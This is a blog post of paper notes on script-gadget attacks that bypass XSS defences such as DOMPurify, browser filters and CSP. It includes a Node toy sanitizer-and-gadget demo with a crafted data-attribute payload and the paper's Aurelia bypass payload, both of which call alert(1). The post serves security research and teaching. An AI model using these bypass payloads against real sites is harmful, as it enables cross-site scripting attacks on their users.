Title: Paper notes - Code-Reuse Attacks for the Web
Date: 2017-09-04 23:50

This post is in the same spirit as [the ones from argp](https://argp.github.io/posts/).

- Complete title: Code-Reuse Attacks for the Web: Breaking Cross-Site Scripting
Mitigations via Script Gadgets
- PDF: [9bc7dd6f063509ecffef7c178ef817e788f1d57319f27deda422c4b40704ff29]({static}/files/papers/9bc7dd6f063509ecffef7c178ef817e788f1d57319f27deda422c4b40704ff29_ccs_gadgets.pdf)

Since XSS isn't a solved problem yet, the focus has shifted to second lines of
defence, like browser XSS filters, HTML sanitizers, WAFs and
[CSP](https://www.w3.org/TR/CSP/).
The point of the paper is to use *script gadgets*, a bit like the
[ROP](https://en.wikipedia.org/wiki/Return-oriented_programming) we're used to
in the memory-corruption world: existing, legitimate JavaScript already shipped
by the page (usually reached through a DOM selector) that picks up
attacker-controlled markup and feeds it into a sink such as `innerHTML` or
`eval`, turning otherwise inert HTML into code. That is enough to bypass
mitigations like NoScript, DOMPurify, browser XSS filters, and various CSP
shenanigans. Useful gadgets can be found in all modern JavaScript frameworks
(Vue.js, Aurelia, AngularJS, Polymer, EmberJS, jQuery, Bootstrap, …).
Gadgets can apparently be found by taint-tracking data-flow analysis, but the
paper doesn't elaborate much on this front, except that it builds on
[25 Million Flows Later - Large-scale Detection of DOM-based XSS]({static}/files/domxss.pdf).

The attack looks like:

1. We inject our payload into the page's raw HTML.
2. The XSS defence (sanitizer, browser filter, WAF, CSP) validates it: the
   payload contains no script, no event handler and no `javascript:` URL, only
   markup and attributes that look benign.
3. A gadget, i.e. legitimate JavaScript already present in the page, selects our
   markup from the DOM and transforms it, for instance by copying an attribute
   value into `innerHTML` or into an expression evaluator.
4. The transformed payload is executed, after the defence already had its say.
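To make the four steps concrete, here is a toy pipeline I'd write to trace them in Node without a browser. It is an added example, not code from the paper or from the authors' PoC repository: a minimal HTML tokenizer stands in for the browser's parser, an allow-list sanitizer mimics the spirit of DOMPurify's defaults, and the gadget is of the kind the paper describes, a selector-driven piece of legitimate page code that rebuilds markup from a `data-*` attribute. All function names, the regexes and the payload string are my own, and the payload is constructed for the demonstration.

```javascript
// Added example, not code from the paper or its PoC repository: a toy
// sanitizer and a toy script gadget so the four steps above can be traced in
// Node without a browser. The mini tokenizer stands in for the HTML parser;
// every name below is mine and the payload is constructed for the demo.

// Tag/attribute scanner. Attribute values are kept as opaque strings, which is
// exactly how a DOM-based sanitizer sees them.
const TAG_RE = /<(\/?)([a-zA-Z][\w-]*)((?:\s+[^\s=\/>]+(?:\s*=\s*(?:"[^"]*"|'[^']*'|[^\s>]+))?)*)\s*(\/?)>/g;
const ATTR_RE = /([^\s=\/>]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+)))?/g;

function tokenize(html) {
  const tokens = [];
  let last = 0;
  for (const m of html.matchAll(TAG_RE)) {
    if (m.index > last) tokens.push({ type: "text", text: html.slice(last, m.index) });
    const attrs = [...m[3].matchAll(ATTR_RE)].map((a) => ({ name: a[1].toLowerCase(), value: a[2] ?? a[3] ?? a[4] ?? "" }));
    tokens.push({ type: "tag", close: m[1] === "/", name: m[2].toLowerCase(), attrs, selfClose: m[4] === "/" });
    last = m.index + m[0].length;
  }
  if (last < html.length) tokens.push({ type: "text", text: html.slice(last) });
  return tokens;
}

function serialize(tokens) {
  return tokens.map((t) => {
    if (t.type === "text") return t.text;
    if (t.close) return `</${t.name}>`;
    const attrs = t.attrs.map((a) => ` ${a.name}="${a.value.replace(/"/g, "&quot;")}"`).join("");
    return `<${t.name}${attrs}${t.selfClose ? "/" : ""}>`;
  }).join("");
}

// Step 2: an allow-list sanitizer in the spirit of DOMPurify's defaults. Unknown
// tags, <script>/<style> contents, on* handlers and non-http(s) hrefs are
// dropped; data-* attributes pass, because their values are "just data".
const ALLOWED_TAGS = new Set(["div", "span", "p", "b", "i", "a", "ul", "li"]);
const ALLOWED_ATTRS = new Set(["id", "class", "title"]);

function attrAllowed(a) {
  if (a.name.startsWith("on")) return false;                             // event handler
  if (a.name.startsWith("data-")) return true;                           // opaque data
  if (a.name === "href") return /^(https?:|\/|#)/i.test(a.value.trim()); // no javascript:
  return ALLOWED_ATTRS.has(a.name);
}

function sanitize(html) {
  const out = [];
  let skipUntil = null; // set while inside a dropped <script>/<style> element
  for (const t of tokenize(html)) {
    if (skipUntil) {
      if (t.type === "tag" && t.close && t.name === skipUntil) skipUntil = null;
      continue;
    }
    if (t.type === "text") { out.push(t); continue; }
    if (!ALLOWED_TAGS.has(t.name)) {
      if (!t.close && (t.name === "script" || t.name === "style")) skipUntil = t.name;
      continue;
    }
    out.push({ ...t, attrs: t.attrs.filter(attrAllowed) });
  }
  return serialize(out);
}

// Step 3: the gadget, i.e. legitimate page code of the kind the paper finds in
// frameworks. It selects elements with data-role="button" and rebuilds their
// markup from data-text, the equivalent of
//   $("[data-role=button]").each(function () {
//     $(this).html("<button>" + $(this).attr("data-text") + "</button>"); });
// The browser decodes entities in attribute values while building the DOM, so
// attr("data-text") already returns raw markup; decodeEntities() models that.
function decodeEntities(s) {
  return s.replace(/&lt;/g, "<").replace(/&gt;/g, ">").replace(/&quot;/g, '"').replace(/&amp;/g, "&");
}

function runButtonGadget(html) {
  return tokenize(html).map((t) => {
    if (t.type !== "tag" || t.close) return serialize([t]);
    const role = t.attrs.find((a) => a.name === "data-role");
    if (!role || role.value !== "button") return serialize([t]);
    const text = t.attrs.find((a) => a.name === "data-text");
    return serialize([t]) + "<button>" + decodeEntities(text ? text.value : "") + "</button>";
  }).join("");
}

// Step 1: constructed attacker input. No <script>, no on* attribute, no
// javascript: URL, so the allow-list passes it; the dangerous markup hides in
// an attribute value the sanitizer treats as inert.
const PAYLOAD = '<div data-role="button" data-text="&lt;img src=x onerror=alert(1)&gt;"></div>';

// Inspect markup the way a sanitizer does: by tag and attribute *name*.
const tagsNamed = (html, name) => tokenize(html).filter((t) => t.type === "tag" && !t.close && t.name === name);
const hasEventHandler = (html) => tokenize(html).some((t) => t.type === "tag" && t.attrs.some((a) => a.name.startsWith("on")));

function demo() {
  const sanitized = sanitize(PAYLOAD);            // step 2: comes back unchanged
  const afterGadget = runButtonGadget(sanitized); // step 3: now contains <img onerror=...>
  return { sanitized, afterGadget };              // step 4 is the browser firing onerror
}

if (typeof require !== "undefined" && require.main === module) {
  const r = demo();
  console.log("sanitizer saw img / handler:", tagsNamed(r.sanitized, "img").length, hasEventHandler(r.sanitized));
  console.log("after gadget:", r.afterGadget);
}
```

Run it with `node` and compare the two lines: the sanitizer sees a `div` with two `data-*` attributes and lets it through untouched, while the very same string, once the gadget has done its job, holds an `<img>` with an `onerror` handler that a browser would fire. Note that the sanitizer is not buggy in any classic sense (a direct `<img onerror>` or `<script>` is stripped); it simply answers a question about the markup *before* the page's own JavaScript rewrites it.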

I really liked the Aurelia payload, which bypasses *everything* the paper tested:

```html
<div ref=foo s.bind="$this.foo.ownerDocument.defaultView.alert(1)">
```

Nothing in there triggers a sanitizer or a browser filter: no `<script>`, no
`on*` handler, no `javascript:` URL, just a `div` with two attributes. `ref=foo`
makes Aurelia expose the element as `foo` on the binding context, and the
`s.bind` expression walks from that element to its `ownerDocument`, then to
`defaultView` (the `window`, and the property name is case-sensitive) and calls
`alert`. Because Aurelia evaluates the expression with its own parser rather
than handing it to `eval`, a CSP without `'unsafe-eval'` doesn't stop it either.

The authors conclude:

> As we have demonstrated, the current generation of XSS mitigations
> is unable to handle XSS attacks that leverage script gadgets
> to execute their payloads.

It's worth noting that the paper comes, as every decent piece of research
should, with code to <del>play with</del> reproduce its results; it can be found
[here](https://github.com/google/security-research-pocs/tree/master/script-gadgets),
or [here]({static}/files/papers/script-gadgets.tar.xz) (local mirror, `2017-09-04`).
Reading the `bypasses.md` file is recommended ;)
